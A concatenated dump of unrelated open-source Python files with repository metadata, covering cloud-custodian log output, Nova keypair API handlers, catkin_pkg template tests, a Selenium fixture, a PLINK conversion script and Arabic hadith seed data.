log_group=self.ctx.options.log_group,
log_stream=self.ctx.policy.name,
session_factory=lambda x=None: self.ctx.session_factory(
assume=False))
def __repr__(self):
return "<%s to group:%s stream:%s>" % (
self.__class__.__name__,
self.ctx.options.log_group,
self.ctx.policy.name)
class FSOutput(LogOutput):
@staticmethod
def select(path):
for k in blob_outputs.keys():
if path.startswith('%s://' % k):
return blob_outputs[k]
# Fall back local disk
return blob_outputs['file']
@staticmethod
def join(*parts):
return os.path.join(*parts)
def __init__(self, ctx):
super(FSOutput, self).__init__(ctx)
self.root_dir = self.ctx.output_path or tempfile.mkdtemp()
def get_handler(self):
return logging.FileHandler(
os.path.join(self.root_dir, 'custodian-run.log'))
def compress(self):
        # Compress files individually so it's easy to walk them without
        # downloading a tarball and extracting it.
for root, dirs, files in os.walk(self.root_dir):
for f in files:
fp = os.path.join(root, f)
with gzip.open(fp + ".gz", "wb", compresslevel=7) as zfh:
with open(fp, "rb") as sfh:
shutil.copyfileobj(sfh, zfh, length=2**15)
os.remove(fp)
@blob_outputs.register('file')
class DirectoryOutput(FSOutput):
permissions = ()
def __init__(self, ctx):
super(DirectoryOutput, self).__init__(ctx)
if self.root_dir.startswith('file://'):
self.root_dir = self.root_dir[len('file://'):]
if self.ctx.output_path is not None:
if not os.path.exists(self.root_dir):
os.makedirs(self.root_dir)
def __repr__(self):
return "<%s to dir:%s>" % (self.__class__.__name__, self.root_dir)
@blob_outputs.register('s3')
class S3Output(FSOutput):
"""
Usage:
.. code-block:: python
with S3Output(session_factory, 's3://bucket/prefix'):
log.info('xyz') # -> log messages sent to custodian-run.log.gz
"""
permissions = ('S3:PutObject',)
def __init__(self, ctx):
super(S3Output, self).__init__(ctx)
self.date_path = datetime.datetime.now().strftime('%Y/%m/%d/%H')
self.s3_path, self.bucket, self.key_prefix = parse_s3(
self.ctx.output_path)
self.root_dir = tempfile.mkdtemp()
self.transfer = None
def __repr__(self):
return "<%s to bucket:%s prefix:%s>" % (
self.__class__.__name__,
self.bucket,
"%s/%s" % (self.key_prefix, self.date_path))
@staticmethod
def join(*parts):
return "/".join([s.strip('/') for s in parts])
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
from boto3.s3.transfer import S3Transfer, TransferConfig
if exc_type is not None:
log.exception("Error while executing policy")
log.debug("Uploading policy logs")
self.leave_log()
self.compress()
self.transfer = S3Transfer(
self.ctx.session_factory(assume=False).client('s3'),
config=TransferConfig(use_threads=False))
self.upload()
shutil.rmtree(self.root_dir)
log.debug("Policy Logs uploaded")
def upload(self):
for root, dirs, files in os.walk(self.root_dir):
for f in files:
key = "%s/%s%s" % (
self.key_prefix,
self.date_path,
"%s/%s" % (
root[len(self.root_dir):], f))
key = key.strip('/')
self.transfer.upload_file(
os.path.join(root, f), self.bucket, key,
extra_args={
'ACL': 'bucket-owner-full-control',
'ServerSideEncryption': 'AES256'})
|
taohungyang/cloud-custodian
|
c7n/output.py
|
Python
|
apache-2.0
| 9,658 | 0.000207 |
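A standalone sketch of the BUFFER_SIZE batching MetricsOutput relies on; chunks() below is a local stand-in assumed to behave like c7n.utils.chunks, and the datapoints are fabricated.

def chunks(items, size):
    # Assumed equivalent of c7n.utils.chunks: fixed-size slices.
    for i in range(0, len(items), size):
        yield items[i:i + size]

BUFFER_SIZE = 20  # CloudWatch PutMetricData caps a request at 20 datapoints
metrics = [{'MetricName': 'ResourceCount', 'Value': n, 'Unit': 'Count'}
           for n in range(45)]

for batch in chunks(metrics, BUFFER_SIZE):
    print('put_metric_data with %d datapoints' % len(batch))
# -> batches of 20, 20 and 5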
#!/usr/bin/env python
import sys
urllib_urlretrieve = None
try:
# Python 3.x or later
import urllib.request
urllib_urlretrieve = urllib.request.urlretrieve
except ImportError:
# Python 2.x
import urllib
urllib_urlretrieve = urllib.urlretrieve
def download(url, target_path):
urllib_urlretrieve(url, target_path)
if __name__ == '__main__':
if len(sys.argv) != 3:
        print('Usage: python %s url target_path' % sys.argv[0])
sys.exit()
url = sys.argv[1]
target_path = sys.argv[2]
download(url, target_path)
|
knimon-software/ffos-meets-closure
|
tools/sub/download.py
|
Python
|
mit
| 567 | 0 |
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox(capabilities={"marionette": False}, firefox_binary="C:/Program Files/Mozilla Firefox/firefox.exe")
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def open_homepage(self):
wd = self.wd
if not wd.current_url.endswith("addressbook/"):
wd.get(self.base_url)
def destroy(self):
self.wd.quit()
|
schukinp/python_training
|
fixture/application.py
|
Python
|
apache-2.0
| 1,091 | 0.003666 |
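A hypothetical conftest.py sketch showing what is_valid() is for: cache one Application across tests and rebuild it only after the browser session dies. The fixture name and base_url are assumptions; open_homepage() is the method defined above.

import pytest
from fixture.application import Application

app_instance = None

@pytest.fixture
def app():
    global app_instance
    # Reuse the cached browser unless it has been closed or crashed.
    if app_instance is None or not app_instance.is_valid():
        app_instance = Application(browser="firefox",
                                   base_url="http://localhost/addressbook/")
    app_instance.open_homepage()
    return app_instance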
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Keypair management extension."""
import webob
import webob.exc
from nova.api.openstack import api_version_request
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import keypairs
from nova.api.openstack.compute.views import keypairs as keypairs_view
from nova.api.openstack import wsgi
from nova.api import validation
from nova.compute import api as compute_api
from nova import exception
from nova.objects import keypair as keypair_obj
from nova.policies import keypairs as kp_policies
class KeypairController(wsgi.Controller):
"""Keypair API controller for the OpenStack API."""
_view_builder_class = keypairs_view.ViewBuilder
def __init__(self):
super(KeypairController, self).__init__()
self.api = compute_api.KeypairAPI()
@wsgi.Controller.api_version("2.10")
@wsgi.response(201)
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v210)
def create(self, req, body):
"""Create or import keypair.
A policy check restricts users from creating keys for other users
params: keypair object with:
name (required) - string
public_key (optional) - string
type (optional) - string
user_id (optional) - string
"""
# handle optional user-id for admin only
user_id = body['keypair'].get('user_id')
return self._create(req, body, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@wsgi.response(201)
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v22)
def create(self, req, body): # noqa
"""Create or import keypair.
Sending name will generate a key and return private_key
and fingerprint.
Keypair will have the type ssh or x509, specified by type.
You can send a public_key to add an existing ssh/x509 key.
params: keypair object with:
name (required) - string
public_key (optional) - string
type (optional) - string
"""
return self._create(req, body, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@wsgi.expected_errors((400, 403, 409))
@validation.schema(keypairs.create_v20, "2.0", "2.0")
@validation.schema(keypairs.create, "2.1", "2.1")
def create(self, req, body): # noqa
"""Create or import keypair.
Sending name will generate a key and return private_key
and fingerprint.
You can send a public_key to add an existing ssh key.
params: keypair object with:
name (required) - string
public_key (optional) - string
"""
return self._create(req, body)
def _create(self, req, body, user_id=None, key_type=False):
context = req.environ['nova.context']
params = body['keypair']
name = common.normalize_name(params['name'])
key_type_value = params.get('type', keypair_obj.KEYPAIR_TYPE_SSH)
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'create',
target={'user_id': user_id})
return_priv_key = False
try:
if 'public_key' in params:
keypair = self.api.import_key_pair(
context, user_id, name, params['public_key'],
key_type_value)
else:
keypair, private_key = self.api.create_key_pair(
context, user_id, name, key_type_value)
keypair['private_key'] = private_key
return_priv_key = True
except exception.KeypairLimitExceeded as e:
raise webob.exc.HTTPForbidden(explanation=str(e))
except exception.InvalidKeypair as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
except exception.KeyPairExists as exc:
raise webob.exc.HTTPConflict(explanation=exc.format_message())
return self._view_builder.create(keypair,
private_key=return_priv_key,
key_type=key_type)
@wsgi.Controller.api_version("2.1", "2.1")
@validation.query_schema(keypairs.delete_query_schema_v20)
@wsgi.response(202)
@wsgi.expected_errors(404)
def delete(self, req, id):
self._delete(req, id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.delete_query_schema_v20)
@wsgi.response(204)
@wsgi.expected_errors(404)
def delete(self, req, id): # noqa
self._delete(req, id)
@wsgi.Controller.api_version("2.10") # noqa
@validation.query_schema(keypairs.delete_query_schema_v275, '2.75')
@validation.query_schema(keypairs.delete_query_schema_v210, '2.10', '2.74')
@wsgi.response(204)
@wsgi.expected_errors(404)
def delete(self, req, id): # noqa
# handle optional user-id for admin only
user_id = self._get_user_id(req)
self._delete(req, id, user_id=user_id)
def _delete(self, req, id, user_id=None):
"""Delete a keypair with a given name."""
context = req.environ['nova.context']
# handle optional user-id for admin only
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'delete',
target={'user_id': user_id})
try:
self.api.delete_key_pair(context, user_id, id)
except exception.KeypairNotFound as exc:
raise webob.exc.HTTPNotFound(explanation=exc.format_message())
def _get_user_id(self, req):
if 'user_id' in req.GET.keys():
user_id = req.GET.getall('user_id')[0]
return user_id
@wsgi.Controller.api_version("2.10")
@validation.query_schema(keypairs.show_query_schema_v275, '2.75')
@validation.query_schema(keypairs.show_query_schema_v210, '2.10', '2.74')
@wsgi.expected_errors(404)
def show(self, req, id):
# handle optional user-id for admin only
user_id = self._get_user_id(req)
return self._show(req, id, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.show_query_schema_v20)
@wsgi.expected_errors(404)
def show(self, req, id): # noqa
return self._show(req, id, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@validation.query_schema(keypairs.show_query_schema_v20)
@wsgi.expected_errors(404)
def show(self, req, id): # noqa
return self._show(req, id)
def _show(self, req, id, key_type=False, user_id=None):
"""Return data for the given key name."""
context = req.environ['nova.context']
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'show',
target={'user_id': user_id})
try:
keypair = self.api.get_key_pair(context, user_id, id)
except exception.KeypairNotFound as exc:
raise webob.exc.HTTPNotFound(explanation=exc.format_message())
return self._view_builder.show(keypair, key_type=key_type)
@wsgi.Controller.api_version("2.35")
@validation.query_schema(keypairs.index_query_schema_v275, '2.75')
@validation.query_schema(keypairs.index_query_schema_v235, '2.35', '2.74')
@wsgi.expected_errors(400)
def index(self, req):
user_id = self._get_user_id(req)
return self._index(req, key_type=True, user_id=user_id, links=True)
@wsgi.Controller.api_version("2.10", "2.34") # noqa
@validation.query_schema(keypairs.index_query_schema_v210)
@wsgi.expected_errors(())
def index(self, req): # noqa
# handle optional user-id for admin only
user_id = self._get_user_id(req)
return self._index(req, key_type=True, user_id=user_id)
@wsgi.Controller.api_version("2.2", "2.9") # noqa
@validation.query_schema(keypairs.index_query_schema_v20)
@wsgi.expected_errors(())
def index(self, req): # noqa
return self._index(req, key_type=True)
@wsgi.Controller.api_version("2.1", "2.1") # noqa
@validation.query_schema(keypairs.index_query_schema_v20)
@wsgi.expected_errors(())
def index(self, req): # noqa
return self._index(req)
def _index(self, req, key_type=False, user_id=None, links=False):
"""List of keypairs for a user."""
context = req.environ['nova.context']
user_id = user_id or context.user_id
context.can(kp_policies.POLICY_ROOT % 'index',
target={'user_id': user_id})
if api_version_request.is_supported(req, min_version='2.35'):
limit, marker = common.get_limit_and_marker(req)
else:
limit = marker = None
try:
key_pairs = self.api.get_key_pairs(
context, user_id, limit=limit, marker=marker)
except exception.MarkerNotFound as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return self._view_builder.index(req, key_pairs, key_type=key_type,
links=links)
|
openstack/nova
|
nova/api/openstack/compute/keypairs.py
|
Python
|
apache-2.0
| 9,891 | 0 |
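For illustration, the request body the 2.10+ create() handler above accepts, with the fields named in its docstring; the key material and user id are placeholders.

import json

body = {
    "keypair": {
        "name": "my-key",                             # required
        "type": "ssh",                                # optional: ssh or x509
        "public_key": "ssh-rsa AAAAB3... user@host",  # optional: import an existing key
        "user_id": "0123abcd",                        # optional, admin-only
    }
}
print(json.dumps(body, indent=2))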
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020 dl1ksv.
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, gr_unittest
from PyQt5 import Qt
import sip
# from gnuradio import blocks
try:
from display import text_msg
except ImportError:
import os
import sys
dirname, filename = os.path.split(os.path.abspath(__file__))
sys.path.append(os.path.join(dirname, "bindings"))
    from display import text_msg  # fallback must import the same name used below
class qa_display_text_msg(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_instance(self):
instance = text_msg('TestString','test',80,None)
b = sip.wrapinstance(instance.pyqwidget(),Qt.QWidget)
def test_001_descriptive_test_name(self):
# set up fg
self.tb.run()
# check data
if __name__ == '__main__':
gr_unittest.run(qa_display_text_msg)
|
dl1ksv/gr-display
|
python/qa_display_text_msg.py
|
Python
|
gpl-3.0
| 951 | 0.005258 |
import os
import unittest
import tempfile
import shutil
from mock import MagicMock, Mock
from catkin_pkg.package_templates import _safe_write_files, create_package_files, \
create_cmakelists, create_package_xml, PackageTemplate, _create_include_macro, \
_create_targetlib_args
from catkin_pkg.package import parse_package, Dependency, Export, Url, PACKAGE_MANIFEST_FILENAME
from catkin_pkg.python_setup import generate_distutils_setup
def u(str):
try:
return unicode(str)
except NameError:
return str
class TemplateTest(unittest.TestCase):
def get_maintainer(self):
maint = Mock()
maint.email = 'foo@bar.com'
maint.name = 'John Foo'
return maint
def test_safe_write_files(self):
file1 = os.path.join('foo', 'bar')
file2 = os.path.join('foo', 'baz')
newfiles = {file1: 'foobar', file2: 'barfoo'}
try:
rootdir = tempfile.mkdtemp()
_safe_write_files(newfiles, rootdir)
self.assertTrue(os.path.isfile(os.path.join(rootdir, file1)))
self.assertTrue(os.path.isfile(os.path.join(rootdir, file2)))
self.assertRaises(ValueError, _safe_write_files, newfiles, rootdir)
finally:
shutil.rmtree(rootdir)
def test_create_cmakelists(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
result = create_cmakelists(mock_pack, 'groovy')
self.assertTrue('project(foo)' in result, result)
self.assertTrue('find_package(catkin REQUIRED)' in result, result)
mock_pack.catkin_deps = ['bar', 'baz']
result = create_cmakelists(mock_pack, 'groovy')
self.assertTrue('project(foo)' in result, result)
expected = """find_package(catkin REQUIRED COMPONENTS
bar
baz
)"""
self.assertTrue(expected in result, result)
def test_create_package_xml(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='foo',
description='foo',
version='0.0.0',
maintainers=[maint],
licenses=['BSD'])
result = create_package_xml(pack, 'groovy')
self.assertTrue('<name>foo</name>' in result, result)
def test_create_targetlib_args(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp', 'rospy']
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = []
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = []
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_targetlib_args(mock_pack)
self.assertEqual('# ${catkin_LIBRARIES}\n# ${Boost_LIBRARIES}\n# ${log4cxx_LIBRARIES}\n# ${BZip2_LIBRARIES}\n', statement)
def test_create_include_macro(self):
mock_pack = MagicMock()
mock_pack.name = 'foo'
mock_pack.catkin_deps = []
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)', statement)
mock_pack.catkin_deps = ['roscpp', 'rospy']
mock_pack.boost_comps = []
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = []
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = []
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement)
mock_pack.catkin_deps = ['roscpp']
mock_pack.boost_comps = ['thread', 'filesystem']
mock_pack.system_deps = ['log4cxx', 'BZip2']
statement = _create_include_macro(mock_pack)
self.assertEqual('# include_directories(include)\n# TODO: Check names of system library include directories (log4cxx, BZip2)\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n ${Boost_INCLUDE_DIRS}\n ${log4cxx_INCLUDE_DIRS}\n ${BZip2_INCLUDE_DIRS}\n)', statement)
def test_create_package(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
description='bar',
package_format='1',
version='0.0.0',
version_abi='pabi',
maintainers=[maint],
licenses=['BSD'])
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy', {file1: ''})
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
finally:
shutil.rmtree(rootdir)
def test_create_package_template(self):
template = PackageTemplate._create_package_template(
package_name='bar2',
catkin_deps=['dep1', 'dep2'])
self.assertEqual('dep1', template.build_depends[0].name)
self.assertEqual('dep2', template.build_depends[1].name)
def test_parse_generated(self):
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
package_format=1,
version='0.0.0',
version_abi='pabi',
urls=[Url('foo')],
description='pdesc',
maintainers=[maint],
licenses=['BSD'])
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy')
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
pack_result = parse_package(file2)
self.assertEqual(pack.name, pack_result.name)
self.assertEqual(pack.package_format, pack_result.package_format)
self.assertEqual(pack.version, pack_result.version)
self.assertEqual(pack.version_abi, pack_result.version_abi)
self.assertEqual(pack.description, pack_result.description)
self.assertEqual(pack.maintainers[0].name, pack_result.maintainers[0].name)
self.assertEqual(pack.maintainers[0].email, pack_result.maintainers[0].email)
self.assertEqual(pack.authors, pack_result.authors)
self.assertEqual(pack.urls[0].url, pack_result.urls[0].url)
self.assertEqual('website', pack_result.urls[0].type)
self.assertEqual(pack.licenses, pack_result.licenses)
self.assertEqual(pack.build_depends, pack_result.build_depends)
self.assertEqual(pack.buildtool_depends, pack_result.buildtool_depends)
self.assertEqual(pack.run_depends, pack_result.run_depends)
self.assertEqual(pack.test_depends, pack_result.test_depends)
self.assertEqual(pack.conflicts, pack_result.conflicts)
self.assertEqual(pack.replaces, pack_result.replaces)
self.assertEqual(pack.exports, pack_result.exports)
rdict = generate_distutils_setup(package_xml_path=file2)
self.assertEqual({'name': 'bar',
'maintainer': u('John Foo'),
'maintainer_email': 'foo@bar.com',
'description': 'pdesc',
'license': 'BSD',
'version': '0.0.0',
'author': '',
'url': 'foo'}, rdict)
finally:
shutil.rmtree(rootdir)
def test_parse_generated_multi(self):
# test with multiple attributes filled
maint = self.get_maintainer()
pack = PackageTemplate(name='bar',
package_format=1,
version='0.0.0',
version_abi='pabi',
description='pdesc',
maintainers=[maint, maint],
authors=[maint, maint],
licenses=['BSD', 'MIT'],
urls=[Url('foo', 'bugtracker'), Url('bar')],
build_depends=[Dependency('dep1')],
buildtool_depends=[Dependency('dep2'),
Dependency('dep3')],
run_depends=[Dependency('dep4', version_lt='4')],
test_depends=[Dependency('dep5',
version_gt='4',
version_lt='4')],
conflicts=[Dependency('dep6')],
replaces=[Dependency('dep7'),
Dependency('dep8')],
exports=[Export('architecture_independent'),
Export('meta_package')])
def assertEqualDependencies(deplist1, deplist2):
            if len(deplist1) != len(deplist2):
return False
for depx, depy in zip(deplist1, deplist2):
for attr in ['name', 'version_lt', 'version_lte',
'version_eq', 'version_gte', 'version_gt']:
if getattr(depx, attr) != getattr(depy, attr):
return False
return True
try:
rootdir = tempfile.mkdtemp()
file1 = os.path.join(rootdir, 'CMakeLists.txt')
file2 = os.path.join(rootdir, PACKAGE_MANIFEST_FILENAME)
create_package_files(rootdir, pack, 'groovy')
self.assertTrue(os.path.isfile(file1))
self.assertTrue(os.path.isfile(file2))
pack_result = parse_package(file2)
self.assertEqual(pack.name, pack_result.name)
self.assertEqual(pack.package_format, pack_result.package_format)
self.assertEqual(pack.version, pack_result.version)
self.assertEqual(pack.version_abi, pack_result.version_abi)
self.assertEqual(pack.description, pack_result.description)
self.assertEqual(len(pack.maintainers), len(pack_result.maintainers))
self.assertEqual(len(pack.authors), len(pack_result.authors))
self.assertEqual(len(pack.urls), len(pack_result.urls))
self.assertEqual(pack.urls[0].url, pack_result.urls[0].url)
self.assertEqual(pack.urls[0].type, pack_result.urls[0].type)
self.assertEqual(pack.licenses, pack_result.licenses)
self.assertTrue(assertEqualDependencies(pack.build_depends,
pack_result.build_depends))
self.assertTrue(assertEqualDependencies(pack.build_depends,
pack_result.build_depends))
self.assertTrue(assertEqualDependencies(pack.buildtool_depends,
pack_result.buildtool_depends))
self.assertTrue(assertEqualDependencies(pack.run_depends,
pack_result.run_depends))
self.assertTrue(assertEqualDependencies(pack.test_depends,
pack_result.test_depends))
self.assertTrue(assertEqualDependencies(pack.conflicts,
pack_result.conflicts))
self.assertTrue(assertEqualDependencies(pack.replaces,
pack_result.replaces))
self.assertEqual(pack.exports[0].tagname, pack_result.exports[0].tagname)
self.assertEqual(pack.exports[1].tagname, pack_result.exports[1].tagname)
rdict = generate_distutils_setup(package_xml_path=file2)
self.assertEqual({'name': 'bar',
'maintainer': u('John Foo <foo@bar.com>, John Foo <foo@bar.com>'),
'description': 'pdesc',
'license': 'BSD, MIT',
'version': '0.0.0',
'author': u('John Foo <foo@bar.com>, John Foo <foo@bar.com>'),
'url': 'bar'}, rdict)
finally:
shutil.rmtree(rootdir)
|
ipa-mdl/catkin_pkg
|
test/test_templates.py
|
Python
|
bsd-3-clause
| 14,395 | 0.001389 |
#!/usr/bin/env python
# encoding: utf-8
import glob
import os
import subprocess
'''
Convert 23andMe files to
PLINK format
'''
def twenty3_and_me_files():
"""Return the opensnp files that are 23 and me format"""
    all_twenty3_and_me_files = glob.glob('../opensnp_datadump.current/*.23andme.txt')
fifteen_mb = 15 * 1000 * 1000
non_junk_files = [path for path in all_twenty3_and_me_files if os.path.getsize(path) > fifteen_mb]
return non_junk_files
def run_plink_format(usable_files):
"""Reformat the 23andMe files into plink binary stuff"""
for f in usable_files:
gid = f.split("/")[-1].split("_")[1].replace("file","")
call = "../plink_v190/plink --23file "+ f + " F" + gid + "ID" + gid + "I 1"
call += " --out ../plink_binaries/" + gid
print "convert gid " + gid
subprocess.call(call,shell=True)
usable_files = twenty3_and_me_files()
run_plink_format(usable_files)
|
ciyer/opensnp-fun
|
run_plink_reformat.py
|
Python
|
mit
| 886 | 0.023702 |
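What the call string above expands to for a hypothetical dump file name; the FID/IID arguments are printed exactly as the code concatenates them.

f = '../opensnp_datadump.current/user42_file17_yearofbirth_unknown.23andme.txt'
gid = f.split("/")[-1].split("_")[1].replace("file", "")  # -> '17'
call = "../plink_v190/plink --23file " + f + " F" + gid + "ID" + gid + "I 1"
call += " --out ../plink_binaries/" + gid
print(call)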
# -*- coding: utf-8 -*-
"""
Contains data that initially get added to the database to bootstrap it.
"""
from __future__ import unicode_literals
# pylint: disable=invalid-name
prophet_muhammad = {
'title': u'Prophet',
'display_name': u'النبي محمد (صلى الله عليه وآله وسلم)'.strip(),
'full_name': u'محمد بن عبد الله بن عبد المطلب بن هاشم'.strip(),
'brief_desc': u'نبي الإسلام، عليه وعلى آله الصلاة والسلام'.strip(),
'birth_year': 570,
'death_year': 632
}
imam_alsadiq = {
'title': u'Imam',
'display_name': u'الإمام الصادق (عليه السلام)',
'full_name': u"جعفر بن محمد الصادق",
'brief_desc': u'إمام من أئمة المسلمين وسادس أئمة الشيعة الاثنى عشرية'
}
# pylint: disable=line-too-long
first_shia_hadith_text = u'''
نضر الله عبدا سمع مقالتي فوعاها وحفظها وبلغها من لم يسمعها، فرب حامل فقه غير فقيه ورب حامل فقه إلى من هو أفقه منه، ثلاث لا يغل عليهن قلب امرئ مسلم: إخلاص العمل لله، والنصحية لائمة المسلمين، واللزوم لجماعتهم، فإن دعوتهم محيطة من ورائهم، المسلمون إخوة تتكافى دماؤهم ويسعى بذمتهم أدناهم.
'''.strip()
first_sunni_hadith_text = u'''
نضر الله عبدا سمع مقالتي فحفظها ووعاها واداها ، فرب حامل فقه غير فقيه ، ورب حامل فقه الى من هو افقه منه ، ثلاث لا يغل عليهن قلب مسلم : اخلاص العمل لله ، والنصيحة للمسلمين ، ولزوم جماعتهم ، فان دعوتهم تحيط من ورايهم
'''.strip()
# pylint: enable=line-too-long
shia_first_hadith_persons = [
u"عبد الله بن أبي يعفور العبدي".strip(),
u"ابان بن عثمان الأحمر البجلي".strip(),
u"احمد بن محمد بن عمرو بن ابي نصر البزنطي".strip(),
u"احمد بن عيسى".strip()]
sunni_first_hadith_persons = [
u"عبد الله بن مسعود".strip(),
u"عبد الرحمن بن عبد الله الهذلي".strip(),
u"عبد الملك بن عمير اللخمي".strip(),
u"سفيان بن عيينة الهلالي".strip(),
]
holy_quran = u"القرآن الكريم"
holy_quran_suras = [
u"الفاتحة",
u"البقرة",
u"آل عمران",
u"النساء",
u"المائدة",
u"اﻷنعام",
u"اﻷعراف",
u"اﻷنفال",
u"التوبة",
u"يونس",
u"هود",
u"يوسف",
u"الرعد",
u"إبراهيم",
u"الحجر",
u"النحل",
u"اﻹسراء",
u"الكهف",
u"مريم",
u"طه",
u"اﻷنبياء",
u"الحج",
u"المؤمنون",
u"النور",
u"الفرقان",
u"الشعراء",
u"النمل",
u"القصص",
u"العنكبوت",
u"الروم",
u"لقمان",
u"السجدة",
u"اﻷحزاب",
u"سبأ",
u"فاطر",
u"يس",
u"الصافات",
u"ص",
u"الزمر",
u"غافر",
u"فصلت",
u"الشورى",
u"الزخرف",
u"الدخان",
u"الجاثية",
u"اﻷحقاف",
u"محمد",
u"الفتح",
u"الحجرات",
u"ق",
u"الذاريات",
u"الطور",
u"النجم",
u"القمر",
u"الرحمن",
u"الواقعة",
u"الحديد",
u"المجادلة",
u"الحشر",
u"الممتحنة",
u"الصف",
u"الجمعة",
u"المنافقون",
u"التغابن",
u"الطلاق",
u"التحريم",
u"الملك",
u"القلم",
u"الحاقة",
u"المعارج",
u"نوح",
u"الجن",
u"المزمل",
u"المدثر",
u"القيامة",
u"اﻹنسان",
u"المرسلات",
u"النبأ",
u"النازعات",
u"عبس",
u"التكوير",
u"الانفطار",
u"المطففين",
u"الانشقاق",
u"البروج",
u"الطارق",
u"اﻷعلى",
u"الغاشية",
u"الفجر",
u"البلد",
u"الشمس",
u"الليل",
u"الضحى",
u"الشرح",
u"التين",
u"العلق",
u"القدر",
u"البينة",
u"الزلزلة",
u"العاديات",
u"القارعة",
u"التكاثر",
u"العصر",
u"الهمزة",
u"الفيل",
u"قريش",
u"الماعون",
u"الكوثر",
u"الكافرون",
u"النصر",
u"المسد",
u"اﻹخلاص",
u"الفلق",
u"الناس"]
# كتاب الكافي، باب ما امر النبي صلى الله عليه وآله بالنصيحة لائمة
# المسلمين واللزوم لجماعتهم ومن هم؟
# http://www.mezan.net/books/kafi/kafi1/html/ara/books/al-kafi-1/166.html
shia_first_hadith_book = u"الكافي"
# مسند الشافعي، حديث 1105
# https://library.islamweb.net/hadith/display_hbook.php?bk_no=51&hid=1105&pid=
sunni_first_hadith_book = u"مسند الشافعي"
first_hadith_tag = u'علم الحديث'
|
hadithhouse/hadithhouse
|
hadiths/initial_data.py
|
Python
|
mit
| 5,391 | 0.000518 |
class Solution(object):
def checkPossibility(self, nums):
"""
